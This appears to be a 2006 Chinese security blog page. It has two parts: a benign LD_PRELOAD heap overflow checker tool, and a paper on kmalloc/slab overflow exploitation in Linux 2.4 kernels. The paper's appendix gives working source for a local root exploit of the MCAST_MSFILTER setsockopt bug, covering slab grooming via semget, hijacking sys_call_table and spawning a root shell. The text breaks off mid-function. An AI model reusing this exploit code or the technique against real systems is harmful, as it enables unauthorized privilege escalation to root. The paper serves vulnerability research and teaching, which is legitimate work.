2006年12月15日星期五

Linux Heap overflow Checker v0.2.0

一个简单的小工具。这个工具可以在溢出发生时crash进程,这样就可以准确的确定堆溢出点。使用这个功能需要编译时指定编译模式:

MODE=-DGHC_CRASH_MODE

#!/bin/bash
##
# Heap overflow Checker
# Version: 0.2.0
# Written by grip2
##

mkdir heapof_check
cd heapof_check

## README
cat <<> README
grip2@debian:~/heapof_check$ ls
Makefile README ghc.c test.c

grip2@debian:~/heapof_check$ make
gcc -shared -o ghc.so -fPIC ghc.c -nostdlib -ldl -Wall
ghc.c:30: warning: integer constant is too large for 'long' type

grip2@debian:~/heapof_check$ export LD_PRELOAD=/home/grip2/heapof_check/ghc.so

grip2@debian:~/heapof_check$ ./test
[** warning **] head overflow at 0x80496d0
[** warning **] tail overflow at 0x80496f0
[** error **] free NULL pointer

grip2@debian:~/heapof_check$ export LD_PRELOAD=
grip2@debian:~/heapof_check$
__EOF__

## ghc.c
cat <<> ghc.c
/**
* ghc.c -- Heap overflow Check
* version: 0.2.0
* Written by grip2
*/

#define _GNU_SOURCE /* for RTLD_NEXT */
#include

#include
#include
#include
#include
#include
#include

#include /* for PAGE_SIZE */

enum { /* memory Alloc MODE */
AMODE_MALLOC = 0,
#define AMDOE_MALLOC AMODE_MALLOC
AMODE_SBRK,
#define AMDOE_SBRK AMODE_SBRK
};

#define hc_log(...) do { printf(__VA_ARGS__); printf("\n"); } while (0)

void *malloc(size_t size);
void free(void *ptr);
void *realloc(void *ptr, size_t size);
void *calloc(size_t nmemb, size_t size);

static void __hc_init(void);

typedef void *malloc_t(size_t size);
static malloc_t *pmalloc;
typedef void free_t(void *);
static free_t *pfree;

#ifndef GHC_CRASH_MODE
typedef long long magic_stamp_t;
static magic_stamp_t magic_stamp = 0x1976112619770116;
#endif

static volatile int init_flag = 0; /* for pmalloc, pfree, etc. */
int hc_lock = 0;

#if 0
int main(void)
{
char *banner = "** ghc.so - Heap overflow Check.\n"
"** Version 0.2.0\n"
"Written by grip2 \n";
return 0;
}
#endif

static void __hc_init(void)
{
char *error;

#ifdef GHC_DEBUG
printf("** Heap overflow Checker init ...\n");
#endif

dlerror(); /* see man dlsym */
pmalloc = (malloc_t *) dlsym(RTLD_NEXT, "malloc");
if ((error = dlerror()) != NULL) { /* JFF: man dlerror */
fprintf(stderr, "in %s line %d: %s\n", __FILE__, __LINE__,
error);
goto err;
}

pfree = (free_t *) dlsym(RTLD_NEXT, "free");
if ((error = dlerror()) != NULL) {
fprintf(stderr, "in %s line %d: %s\n", __FILE__, __LINE__, error);
goto err;
}

return;
err:
exit(-1); /* kill program is better than continue */
}

static void safe_hc_init(void)
{
int val;

val = 1;
__asm__ volatile (
"xchgl %1,%0"
:"=r" (hc_lock)
:"m" (val), "0" (hc_lock)
:"memory");

if (!val) {
__hc_init();
init_flag = 1;
} else {
while (init_flag == 0);
}
}

#ifndef GHC_CRASH_MODE
static inline void *get_head_from_user(void *ptr)
{
void *pmem;

pmem = (char *) ptr - sizeof(magic_stamp) - 2*sizeof(int);
return pmem;
}

static inline void *get_user_from_head(void *pmem)
{
void *ptr;

ptr = (char *) pmem + sizeof(magic_stamp) + 2*sizeof(int);
return ptr;
}

static int memcheck(void *pmem)
{
magic_stamp_t tail_stamp, head_stamp;
int size, size2; /* don't use size_t or unsigned type */
int res = 0;
void *ptr;

/* get head stamp */
memcpy(&head_stamp, pmem, sizeof(head_stamp));
if (memcmp(&head_stamp, &magic_stamp, sizeof(magic_stamp)) != 0) {
hc_log("[** warning **]\t head overflow at %p (stamp)", pmem);
res = -1;
}
/* check length section */
size = *(int *) ((char *) pmem + sizeof(head_stamp));
size2 = *(int *) ((char *) pmem + sizeof(head_stamp) + sizeof(int));
if (size != size2 || size < 0) {
hc_log("[** warning **]\t head overflow at %p (user length)", (char *) pmem + sizeof(head_stamp));
return -1;
}

/* get tail stamp */
ptr = get_user_from_head(pmem);
memcpy(&tail_stamp, ptr + size, sizeof(tail_stamp));
if (memcmp(&tail_stamp, &magic_stamp, sizeof(magic_stamp)) != 0) {
hc_log("[** warning **]\t tail overflow at %p", (char *) pmem + size);
return -1;
}

return res;
}
#endif /* ifndef GHC_CRASH_MODE */

static inline size_t get_user_size(void *ptr)
{
size_t size;

#ifdef GHC_CRASH_MODE
size = *(int *) (ptr - sizeof(unsigned long) - sizeof(unsigned int));
#else
void *pmem;
pmem = get_head_from_user(ptr);
if (memcheck(pmem) != 0)
return -1;

size = *(int *) ((char *) pmem + sizeof(magic_stamp));
#endif
return size;
}

static void *__ghc_alloc(size_t size, int mode)
{
void *pmem, *ptr = NULL;
size_t realsize;

#ifdef GHC_DEBUG
printf("** __ghc_alloc -- mode [%d]\n", mode);
#endif

#ifdef GHC_CRASH_MODE
/**
* memory map: | stuff1 | user_length | real start_addr | user chunk | memory trap | stuff2 | */
realsize = sizeof(unsigned int) /* user_length */
+ sizeof(unsigned long) /* start_addr */
+ size /* user chunk */
+ PAGE_SIZE /* trap */
+ (PAGE_SIZE-1); /* padding (stuff1 + stuff2)*/
#else /* !GHC_CRASH_MODE */
/**
* memory map: | magic | user length | user length | user space | magic | */
realsize = size + 2*sizeof(magic_stamp) + 2*sizeof(int);
#endif

switch (mode) {
case AMODE_MALLOC:
assert(init_flag);
pmem = pmalloc(realsize);
break;
case AMODE_SBRK:
pmem = sbrk(realsize);
if (pmem == (void *) -1)
pmem = NULL;
break;
default:
fprintf(stderr, "Unkonwn ALLOC_MODE [%d]\n", mode);
exit(-1);
}
#ifdef GHC_DEBUG
printf(" ** GHC real malloc: %p\n", pmem);
#endif

if (pmem) {
#ifdef GHC_CRASH_MODE
void *trap;

trap = (void *) ((unsigned long)(pmem + realsize - PAGE_SIZE) & ~(PAGE_SIZE-1));
ptr = trap - size;
*(unsigned long *)(ptr-sizeof(unsigned long)) = (unsigned long) pmem;
*(unsigned int *)(ptr-sizeof(unsigned long)-sizeof(unsigned int)) = size;

if (mprotect(trap, PAGE_SIZE, PROT_NONE)) {
perror("mprotect");
exit(-1);
}
#else /* !GHC_CRASH_MODE */
/* set head stamp */
memcpy(pmem, &magic_stamp, sizeof(magic_stamp));
*(int *) ((char *) pmem + sizeof(magic_stamp)) = (int) size;
*(int *) ((char *) pmem + sizeof(magic_stamp) + sizeof(int)) = (int) size;

/* get user chunk pointer */
ptr = get_user_from_head(pmem);

/* set tail stamp */
memcpy((char *) ptr + size, &magic_stamp, sizeof(magic_stamp));
#endif
}

return ptr;
}

void *malloc(size_t size)
{
#ifdef GHC_DEBUG
printf("** GHC malloc\n");
#endif
if (init_flag == 0) {
safe_hc_init();
}

return __ghc_alloc(size, AMODE_MALLOC);
}

static void __ghc_free(void *ptr)
{
void *pmem;

#ifdef GHC_DEBUG
printf("** __ghc_free\n");
#endif
if (!ptr) {
hc_log("[** warning **]\t free NULL pointer");
return;
}

#ifdef GHC_CRASH_MODE
void *trap;
int size = get_user_size(ptr);

trap = ptr + size;
if (mprotect(trap, PAGE_SIZE, PROT_READ|PROT_WRITE)) {
perror("mprotect");
exit(-1);
}

pmem = *(void **) (ptr - sizeof(unsigned long));
#else
/* get head pointer */
pmem = get_head_from_user(ptr);
if (memcheck(pmem) != 0)
return;
#endif

#ifdef GHC_DEBUG
printf(" ** GHC real free: %p\n", pmem);
#endif
pfree(pmem);
}

void free(void *ptr)
{
#ifdef GHC_DEBUG
printf("** GHC free\n");
#endif
if (init_flag == 0) {
if (!hc_lock) {
fprintf(stderr, "** PANIC PRELOAD - free **\n");
#ifdef GHC_DEBUG
exit(-1);
#endif
}
return;
}

__ghc_free(ptr);
}

void *realloc(void *ptr, size_t size)
{
void *new;
size_t oldsize;

#ifdef GHC_DEBUG
printf("** GHC realloc\n");
#endif
if (init_flag == 0) {
fprintf(stderr, "** PANIC PRELOAD - realloc **\n");
return NULL;
}

if (!ptr) /* see man realloc */
return __ghc_alloc(size, AMODE_MALLOC);
if (!size) { /* see man realloc */
__ghc_free(ptr);
return NULL;
}

new = __ghc_alloc(size, AMODE_MALLOC);
if (new) {
oldsize = get_user_size(ptr);
memcpy(new, ptr, (oldsize*/size)?oldsize:size);
__ghc_free(ptr);
}

return new;
}

void *calloc(size_t nmemb, size_t size)
{
void *p;
size_t len;
int mode;

#ifdef GHC_DEBUG
printf("** GHC calloc\n");
#endif
len = nmemb*size;
mode = (!init_flag && hc_lock)? AMODE_SBRK : AMODE_MALLOC;

if (mode == AMODE_MALLOC) {
safe_hc_init();
}

p = __ghc_alloc(len, mode);
if (p)
bzero(p, len); /* see man calloc */

return p;
}

/* wait a moment ... */
/*
void hc_log(...)
{

}
*/
__EOF__

## test.c
cat <<> test.c

#include
#include
#include

int main(void)
{
void *p = malloc(16);
void *q = malloc(16);

bzero(p, 16);
bzero(p, 18);
#ifndef GHC_CRASH_MODE
*(char *) (p - 9) = 2;
#endif

q = realloc(q, 32);

free(q);
free(p);
free(NULL);
return 0;
}
__EOF__

## Makefile
cat <<> Makefile
#MODE=-DGHC_CRASH_MODE
CFLAG= -Wall -O2 -DNDEBUG \$(MODE)
#CFLAG= -DGHC_DEBUG -ggdb \$(MODE)
CC=gcc

all: test so
test: test.c
\$(CC) \$< -o test \$(CFLAG)
so: ghc.c
\$(CC) -shared -o ghc.so -fPIC \$< -nostdlib -ldl \$(CFLAG)

clean:
rm -f *.o ghc.so test
__EOF__

Linux内核溢出研究系列(2) - kmalloc溢出技术

Linux内核溢出研究系列(2) - kmalloc溢出技术

作者:grip2
日期:2006-04-12

内容:
1 -- 介绍
2 -- kmalloc/slab简介
3 -- kmalloc/slab的关键特性
4 -- kmalloc exploit
5 -- 更进一步
6 -- 最后
7 -- 参考资料
8 -- 附录 (kexp-msfilter.c)

一、** 介绍

关注isec很长时间了,一直对他们在Linux内核方面的技术研究成果很佩服,同时自己也一直
在跟踪和分析这方面的技术,但是由于时间及精力所限一直没能更深入一步进行系统的研究和总
结。这一段恰好有些时间,和airsupply一起在内核溢出方面进行了一些研究,也写出了几个
isec公布的漏洞的利用代码。为了能对我们的阶段性的工作有所归纳和总结,我们开始着手去写
《linux内核溢出研究》系列的paper。写这个文档的一个目的也是为了与国内对这方面有兴趣的
朋友共享我们的经验,促进我们在内核安全方面的研究和交流。

阅读这面文档需要你具有一些Linux内核方面的知识,同时要能读懂一点C和汇编代码。文章里
提到的技术和代码是基于x86架构的Linux kernel-2.4.22的,在其它的系统环境中也许有所不同。

二、** kmalloc/slab

这部分只是非常简单的介绍一下kmalloc,如果你知道kmalloc和slab是什么,那跳过这部分。
对于kmalloc exploit有用的特性,我们在这里并未描述。

slab是一种缓冲区分配和管理的方法,Linux内核也采用了这种方法,并进行了改进。Linux内核
使用slab机制进行管理的缓冲区(caches)有两种,一种是专用缓冲区,另一种是通用缓冲区。通用缓
冲区的分配是通过调用kmalloc函数来完成的,在内核里被广泛使用,在这里我们只关注它。

我们来看kmalloc函数代码:

void * kmalloc (size_t size, int flags)
{
cache_sizes_t *csizep = cache_sizes; <--- A

for (; csizep->cs_size; csizep++) {
if (size > csizep->cs_size)
continue;
return __kmem_cache_alloc(flags & GFP_DMA ? <--- B
csizep->cs_dmacachep : csizep->cs_cachep, flags);
}
return NULL;
}

A处指向的cache_sizes是一个用来描述通用缓冲池的数据结构,其中根据不同的缓冲区的大小分成
若干队列。它是一个cache_sizes_t类型的数组,数组中的每一个元素描述一个特定尺寸对象的缓冲区,
对于每个尺寸的对象分别对应两个slab队列,一个是用于DMA用途分配,另一个则用于非DMA用途分配。
下面是cache_sizes的定义:

/* Size description struct for general caches. */
typedef struct cache_sizes {
size_t cs_size;
kmem_cache_t *cs_cachep;
kmem_cache_t *cs_dmacachep;
} cache_sizes_t;

static cache_sizes_t cache_sizes[] = {
#if PAGE_SIZE == 4096
{ 32, NULL, NULL},
#endif
{ 64, NULL, NULL},
{ 128, NULL, NULL},
{ 256, NULL, NULL},
{ 512, NULL, NULL},
{ 1024, NULL, NULL},
{ 2048, NULL, NULL},
{ 4096, NULL, NULL},
{ 8192, NULL, NULL},
{ 16384, NULL, NULL},
{ 32768, NULL, NULL},
{ 65536, NULL, NULL},
{131072, NULL, NULL},
{ 0, NULL, NULL}
};

kmalloc通过一个for循环语句来遍历这个数组中的元素,直到找到一个能够满足调用者指定的size大小的
缓冲区描述,然后在B处根据调用者传入的标志来选择DMA或非DMA slab队列,再调用__kmem_cache_alloc
在该队列中分配一个缓冲区并返回给调用者。

三、** kmalloc/slab的关键特性

为了能够利用kmalloc溢出漏洞,我们需要了解与kmalloc的三个关键特性(由于kmalloc是基于slab算法的,
因此kmalloc的特性几乎完全由slab算法的实现决定8-)

1、kmalloc/slab是基于伙伴算法的,一个slab块包含多个slab对象,它们是相邻的

slab管理的对象的缓冲区队列是由一连串的slab块组成,而每个slab块内包含若干同种对象。换句话说,
每个slab块内包含多个同种slab对象,对于kmalloc来说,就是在同一个slab块内存放了多个同样大小的
slab对象,即在一个slab块内kmalloc可以分配的内存块是相邻的。

这一点可以通过slab分配代码看出来。当现有slab队列中没有空闲的slab对象时,kmem_cache_grow函数将
被调用。在kmem_cache_grow将会进一步调用kmem_getpages为slab缓冲区分配新的内存,

...
/* Get mem for the objs. */
if (!(objp = kmem_getpages(cachep, flags)))
...

而在kmem_getpages函数里最终调用了__get_free_pages(即system's page allocator,它使用了伙伴算法),
同时传入了cachep->gfporder指定分配的页面数量,注意gfporder是每个slab块占用的页面数,

static inline void * kmem_getpages (kmem_cache_t *cachep, unsigned long flags)
{
...
flags |= cachep->gfpflags;
addr = (void*) __get_free_pages(flags, cachep->gfporder);
...
return addr;
}

2、kmalloc/slab的分配和释放使用的是LIFO队列

这一点从代码很容易看出:

kmalloc -> __kmem_cache_alloc -> skmem_cache_alloc_one -> kmem_cache_alloc_one_tail
...
slabp->inuse++;
objp = slabp->s_mem + slabp->free*cachep->objsize;
slabp->free=slab_bufctl(slabp)[slabp->free];
...

kfree -> __kmem_cache_free -> kmem_cache_free_one
...
{
unsigned int objnr = (objp-slabp->s_mem)/cachep->objsize;

slab_bufctl(slabp)[objnr] = slabp->free;
slabp->free = objnr;
}
...

3、kmalloc/slab分配的内存释放的时候,内容并没有被清除

四、** kmalloc exploit

我们来看一个例子:

-------------------------------------
| | |
... | slab对象A | slab对象B | ...
| | |
-------------------------------------

假设上面是一个64字节通用缓冲区中的一个slab块,块中有多个slab对象,内核中有如下代码片段
...
char *buf = kmalloc(64);
copy_from_user(buf, parm, 80);
...

当kmalloc时,slab对象A被分配给buf,当执行copy_from_user后,buf将被溢出。在slab块中,与对
象A相邻的对象B将被溢出16个字节,如果此时对象B恰好被分配用于存放一个重要的数据结构,那么我
们就有可能通过更改这个数据结构中的某个重要的变量值提升权限(通常某个函数指针是一个好的选择)!

是不是看起来很容易?但是要注意了,要成功的利用上面这个例子的漏洞,我们还有几个问题需要解决:

?如何才能使被溢出的slab对象和我们想要覆盖的目标数据结构所在的slab对象是相邻的?

要做到这点,我们必需保证连续的两次对同一大小slab的申请能够得到相邻的两个slab对象。事实上,
在真实的系统环境中这一点是很难保证的,因为在系统使用过程中,内核会经常的使用kmalloc分配
内存,使用完成后又使用kfree释放,这样就使得slab算法维护的可分配slab对象表(partially and free slabs list)
中slab对象之间是没有任何位置关系的,也就是说这时我们连续两次申请得到的内存块,不但不能保
证它们是相邻的,甚至不能保证它们位于同一个slab块内,这样我们的溢出将是完全不可控的。

为了解决这个问题,在UNF的paper中提到了一个“经验”方法。这个方法就是:在他们的测试环境中,
在将现有的slab消耗(不断的分配)到只剩下最后四个未被分配的slab对象时,对这最后四个slab对象
的申请所得到的内存块地址将是连续的。

在我的实际测试中,这个方法确实有一定的成功率,但是这个方法过于“经验”,对系统环境的依赖性
很强,在实际环境中有时非常容易失败,进而导致系统崩溃。

不过我们想到了一个改进的更好的方法。我们首先耗尽我们的溢出所关注的slab缓冲区中现有的所有slab
对象,这时再有对这个slab缓冲区的分配请求的话,系统将创建一块新的slab块,然后从这个新的slab
块中分配一个slab对象返回给申请者。我们来看看系统对新slab块中的slab对象是如何初始化的,

static inline void kmem_cache_init_objs (kmem_cache_t * cachep,
slab_t * slabp, unsigned long ctor_flags)
{
...
for (i = 0; i <>num; i++) {
void* objp = slabp->s_mem+cachep->objsize*i;
...
slab_bufctl(slabp)[i] = i+1;
}
slab_bufctl(slabp)[i-1] = BUFCTL_END;
slabp->free = 0;
}

可以看到在for循环内,新的slab块将按照cachep->objsize将内存分成若干块,每块就是一个slab对象。
对每一个新的slab对象都有一个slab_bufctl(slabp)[i] = i+1处理。这个语句的作用是把当前对象的
下一个free对象设置为当前slab块内地址与其相邻的下一个对象。最后初始化函数将slab块的第一个free
对象设置为0,即块中的第一个对象。到这里就不难看出,对于新分配的slab块,块内的free-slab表(实际
上可以看做是一个LIFO队列)中的对象在内存上都是顺序的,这样我们再申请的slab分配得到的slab对象
就都是相邻的。

?如何才能保证kmalloc溢出时目标数据结构已经在相邻的slab对象中了呢?

虽然在处理上面的问题时,我们已经可以得到相邻的两个slab对象了,但是往往在第一个被溢出的slab
分配后,在返回到应用程序之前溢出就已经发生了(看前面的例子),而这时我们的第二个slab对象还没
被申请,我们要覆盖的数据结构还没在内存中,这样我们的溢出就无法利用了。

这时我们前面介绍的kmalloc的第二个特性就有用了。由于slab对内存的分配释放是使用LIFO队列,所以
我们可以这样做:首先触发发一个个kalloc去分配与溢出目标尺寸的slab对象作为placeholder(占位),
然后再去触发目标数据结构所需的内存的kmalloc,这时slab块中的情景如下:

------------------------------------------
| | |
... | placeholder | obj-struct | ...
| | |
------------------------------------------

然后我们释放掉placeholder,然后再触发被将溢出的slab对象的分配,由于slab对象的分配释放使用的是
一个后入先出队列,所以将被溢出的slab对象就是刚被释放的placeholder。在溢出发生前,内存的情景如下:

------------------------------------------
| | |
... | overflow-obj | obj-struct | ...
| | |
------------------------------------------

通过这个办法,就保证kmalloc溢出时目标数据结构已经在相邻的slab对象中了,这样我们就可以覆盖我们
指定的数据结构。

?我们如何在应用层做到上面提到的slab对象消耗和分配placeholder呢?

有多个系统调用可以完成这个任务,几个用于IPC的系统调用都可以,但是UNF的paper中提到的sys_semget
比较好,因为它分配的slab对象的尺寸是可控的。每次我们调用sys_semget创建信号量,内核都会使用
kmalloc分配一块内存存放相关数据结构,而且这个数据结构一直存在,直到我们调用删除操作。

sys_semget -> newary
...
size = sizeof (*sma) + nsems * sizeof (struct sem);
sma = (struct sem_array *) ipc_alloc(size);
...

注意上面计算size的代码中的nsems是系统调用的参数,在应用层可以指定。这样我们就可以在任意尺寸的
通用缓冲区中来完成slab对象的消耗和占位。

?我们如何知道什么时候slab被耗尽了呢?从哪里可以看出系统当前还有多少active的slab对象呢?

通过/proc/slabinfo可以得到系统kmalloc的slab信息

grip2@debian:~$ cat /proc/slabinfo
slabinfo - version: 1.1
...
size-131072(DMA) 0 0 131072 0 0 32
size-131072 0 0 131072 0 0 32
size-65536(DMA) 0 0 65536 0 0 16
size-65536 0 0 65536 0 0 16
size-32768(DMA) 0 0 32768 0 0 8
size-32768 0 0 32768 0 0 8
size-16384(DMA) 1 1 16384 1 1 4
size-16384 0 1 16384 0 1 4
size-8192(DMA) 0 0 8192 0 0 2
size-8192 14 14 8192 14 14 2
size-4096(DMA) 0 0 4096 0 0 1
size-4096 30 32 4096 30 32 1
size-2048(DMA) 0 0 2048 0 0 1
size-2048 41 44 2048 22 22 1
size-1024(DMA) 0 0 1024 0 0 1
size-1024 30 36 1024 8 9 1
size-512(DMA) 0 0 512 0 0 1
size-512 74 80 512 10 10 1
size-256(DMA) 0 0 256 0 0 1
size-256 15 30 256 2 2 1
size-128(DMA) 2 30 128 1 1 1
size-128 478 510 128 16 17 1
size-64(DMA) 0 0 64 0 0 1
size-64 87 118 64 2 2 1
size-32(DMA) 2 113 32 1 1 1
size-32 270 339 32 3 3 1

下面是man page里对slabinfo每列数据所代表含义的描述:

For each slab cache, the cache name, the number of currently active objects,
the total number of available objects, the size of each object in bytes,
the number of pages with at least one active object, the total number of allocated pages,
and the number of pages per slab are given.

遗憾的是,在SMP系统环境下,/proc/slabinfo内的信息并不总是能立即反馈系统内真实的slab使用信息,但是
没关系,对于这个问题我们想到了其它办法解决,在文章的后续部分我们将会提及。

?我们应该覆盖什么的数据结构才能提升权限呢?

通常这个数据结构最好包含一个函数指针,而且应用层应该有机会通过这个指针来调用函数,还有一点就是
这个数据结构的分配应该可以在用户层控制,并且它是通过kmalloc被调用的。满足这个条件的数据结构相信
你在内核可以找到很多,例如struct file结构,

struct file {
struct list_head f_list;
struct dentry *f_dentry;
struct vfsmount *f_vfsmnt;
struct file_operations *f_op;
atomic_t f_count;
unsigned int f_flags;
mode_t f_mode;
loff_t f_pos;
unsigned long f_reada, f_ramax, f_raend, f_ralen, f_rawin;
struct fown_struct f_owner;
unsigned int f_uid, f_gid;
int f_error;

unsigned long f_version;

/* needed for tty driver, and maybe others */
void *private_data;

/* preallocated helper kiobuf to speedup O_DIRECT */
struct kiobuf *f_iobuf;
long f_iobuf_lock;
};

struct file结构中的f_op指针为file_operations结构类型,这个结构中定义了对文件进行各种操作时所
对应的回调处理函数:

struct file_operations {
...
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char *, size_t, loff_t *);
int (*readdir) (struct file *, void *, filldir_t);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
int (*ioctl) (struct inode *, struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
...
};

除了函数指针以外,还有其它信息也可以用于提升权限,比如上个问题中用于消耗slab的sys_semget所使用
的数据结构,

struct sem_array {
struct kern_ipc_perm sem_perm; /* permissions .. see ipc.h */
time_t sem_otime; /* last semop time */
time_t sem_ctime; /* last change time */
struct sem *sem_base; /* ptr to first semaphore in array */
struct sem_queue *sem_pending; /* pending operations to be processed */
struct sem_queue **sem_pending_last; /* last pending operation */
struct sem_undo *undo; /* undo requests on this array */
unsigned long sem_nsems; /* no. of semaphores in array */
};

通过覆盖结构中的sem_base成员,就可以对任意内核地址进行读写,见相应内核代码:

sys_semctl -> semctl_main
...
sma = sem_lock(semid);
...
curr = &sma->sem_base[semnum];
...
switch (cmd) {
case GETVAL:
err = curr->semval;
goto out_unlock;
...
case SETVAL:
{
int val = arg.val;
struct sem_undo *un;
err = -ERANGE;
if (val > SEMVMX || val < 0)
goto out_unlock;

for (un = sma->undo; un; un = un->id_next)
un->semadj[semnum] = 0;
curr->semval = val;
curr->sempid = current->pid;
sma->sem_ctime = CURRENT_TIME;
/* maybe some queued-up processes were waiting for this */
update_queue(sma);
err = 0;
goto out_unlock;
}
...

你可以写current、写sys_call_table 等等...

好了,现在回顾前面的例子,你认为还有什么问题没有解决吗?
我们现在是不是就可以完成kmalloc exploit了呢 8-) ... enjoy

五、** 更进一步

看懂一个技术理论容易,但实现却通常不容易,在我写EXP的时候发现,实现我认为已经很明白的东西要比想象
的麻烦很多,会遭遇到很多没有想到的困难。下面是我们在写实际的kmalloc溢出利用程序时遇到的一些问题和
想到的一些新的技术、方法。这些方法有的实现了有的还未测试,在这里简单的罗列一下,如果有兴趣可以一起
探讨,这也是我们下一步充实和研究kmalloc溢出利用技术的方向。

1. /proc/slabinfo

通过读取slabinfo,我们可以足够的用于溢出使用的信息。但是遗憾的是,在我们的测试中发现,在SMP系统下
cat /proc/slabinfo显示的信息并不能与系统的真实情况同步。虽然air发现有些情况这个信息更新的很及时,
但是到现在为止,我们还不能确认规律,这个也有待进一步试验。

2. 另一个得到相邻slab对象的方法(不依赖于/proc/slabinfo)

由于SMP环境下slabinfo存在的问题,消耗完现有系统slab对象以保证得到相邻slab对象的方法也就不在可行,
因为slabinfo信息不准确,我们无法准确得知目前系统有多少个slab对象需要我们预先消耗。不过,即使没有
slabinfo的支持,我们也还有另外一个方法。通常我们可以假设当前系统的slab对象分配尽后,此尺寸的slab
对象的数量并不会达到系统上限(通常都是这样,我还未遇到例外的情况),所以我们可以一直消耗slab对象到
系统上限,这个我们可以通过函数的返回值判断出来,然后我们从尾部的slab对象中释放两个连续对象供我们
的溢出使用,由于前面的假设,所以我们分配的尾部的slab对象一定是在一个新的slab块中,所以它们一定是
相邻的。

3、关于特性三

在kmalloc/slab的特性部分我们提到了三个特性,其中第三个特性在前面并没有被引用。这是因为在本文介绍
的例子中并不需要这个特性,但是在真实漏洞的利用中你也许会用得到。

4、关于isec-0015-msfilter漏洞的利用

本来想拿isec-0015-msfilter的漏洞做一个实例分析,但是想了想解释这个漏洞的利用会引入很多内容(比如进程
权限的提升、漏洞触发的具体条件和一些“讨厌”的约束),那会把这篇文章弄的很复杂,太多的内容会对理解
kmalloc利用的基本技术造成障碍。

随便说一下,如果你研究了isec-0015-msfilter内核漏洞,你也许会发现由于漏洞触发环境的各种约束,可以覆盖
的有价值的数据结构很少,甚至只能找到一些数据的读写地址供覆盖,最后可能只有通过拦截系统调用的方法来提
升权限,而我们知道在有的环境下无法在应用层准确的得到sys_call_table的地址。不过我们后来想到我们可以将
前面提到的“得到相邻slab对象”技术用到溢出数据源本身,这样可以突破漏洞本身对溢出数据源长度的限制,进
而可以覆盖任意的通过kmalloc分配地址的数据结构了,就不再需要sys_call_table了。

六、** 最后

感觉写paper总是比写代码更难,有时解决一个技术问题不易,但是描述和解释一个技术问题却更难,
所以如果文章哪里写的不清楚,存在什么问题,请大家指出和谅解。最后,希望能有更多的交流。

七、** 参考资料

1 Linux内核情景分析

2 kmalloc_exploition.pdf

3 isec-0015-msfilter http://isec.pl

4 内核源代码参考 http://lxr.linux.no

八、** 附录 (kexp-msfilter.c)

下面是isec-0015-msfilter内核漏洞的利用代码,虽然这不是一个通用版本,但是足够作为一个kmalloc exploition
的真实例子了。

/*
* Linux kernel setsockopt MCAST_MSFILTER privilege elevation
* For kernel 2.4.22 - 2.4.25
*
* 2006-04-07
* Written by grip2
*
* grip2@debian:~/kernel-sec/exp-msfilter$ ./kexp-msfilter
* numsrc: 0x4000000c msize: 0x40 gsize: 0x68c optlen: 0x68c
* Prepare ...
* full_numsrc: 15 overflow_numsrc: 3
* size-64 87 118 64 2 2 1
* size-64 119 177 64 3 3 1
* Exploiting ...
* setsockopt: Cannot assign requested address
* sh-2.05b#
**/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define KB * 1024
#define MB * 1024 KB
#define GB * 1024 MB
#define NOP 'A'
int uid, gid;
unsigned task_size;
unsigned user_cs,user_ds;

void **sys_call_table;
#define __NR_hijack_getroot 0
static inline _syscall1(int, hijack_getroot, unsigned long *, val)

#define SOL_IP 0
#define MY_NUMSRC 12

#define SIZE_PIPE_INODE_INFO 64 /* sizeof(struct pipe_inode_info) */
#define SLAB_SIZE (fix_slabsize(SIZE_PIPE_INODE_INFO))

#define MAX_SEM_LIMIT 4096
static int sem_handles[MAX_SEM_LIMIT];
static int sem_count = 0;

/*
* (kernel-2.4.22) -- ipc/sem.c
* ...
* size = sizeof (*sma) + nsems * sizeof (struct sem);
* sma = (struct sem_array *) ipc_alloc(size);
* ...
*/
#define COMPUTE_NSEMS(slabsize) (((fix_slabsize(slabsize)) - 56) / 8);

static int fix_slabsize(slabsize)
{
/*
* (kernel-2.4.22)
**/
int cache_sizes[] = {
#if PAGE_SIZE == 4096
32,
#endif
64,
128,
256,
512,
1024,
2048,
4096,
8192,
16384,
32768,
65536,
131072,
};

int num, i;

num = sizeof(cache_sizes)/sizeof(int);
for (i = 0; i < num; i++) {
if (cache_sizes[i] < slabsize)
continue;
slabsize = cache_sizes[i];
break;
}

return slabsize;
}

unsigned long get_sys_call_table(void)
{
FILE *fp;
char linebuf[128];
char stuff[64];
unsigned long addr;
int found = 0;
int r;

fp = fopen("/proc/ksyms", "r");
if (fp == NULL) {
perror("fopen /proc/ksyms");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

memset(stuff, 0 ,sizeof(stuff));
r = sscanf(linebuf, "%x %s", &addr, stuff);
if (r != 2 || !strstr(stuff, "sys_call_table"))
continue;

printf(linebuf);
found = 1;
break;
}

fclose(fp);
return found ? addr : 0;
}

static void prepare_slab(int slabsize, int left)
{
FILE *fp;
char linebuf[128];
int r, found = 0;
int s_size, s_active, s_total;
int nsems;

slabsize = fix_slabsize(slabsize);
nsems = COMPUTE_NSEMS(slabsize);

fp = fopen("/proc/slabinfo", "r");
if (fp == NULL) {
perror("fopen /proc/slabinfo");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

r = sscanf(linebuf, "size-%d %d %d", &s_size, &s_active, &s_total);
if (r != 3 || s_size != slabsize)
continue;

printf(linebuf);
found = 1;
break;
}
fclose(fp);

if (found) {
int i, num;

num = s_total - s_active - left;
num = (num <= (MAX_SEM_LIMIT-sem_count)) ? num : (MAX_SEM_LIMIT-sem_count);
for (i = sem_count; i < num; i++, sem_count++) {
sem_handles[i] = semget(IPC_PRIVATE, nsems, IPC_CREAT);
}
}

return;
}

static void de_prepare_slab()
{
int i;

for (i = 0; i < sem_count; i++) {
if (sem_handles[i] != -1)
if (semctl(sem_handles[i], 0, IPC_RMID)) perror("ipc_rmid");
}
sem_count = 0;
}

void shellcode(void)
{
char *p[] ={"/bin/sh", 0};
// de_prepare_slab();
execve("/bin/sh",p,0);
_exit(0);
}

void configure(void)
{
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
uid = getuid();
gid = getgid();
user_ds = myget_ds();
user_cs = myget_cs();

}
void kernel(unsigned * task)
{
unsigned * addr = task;

/* looking for uids */
while (addr[0] != uid || addr[1] != uid ||
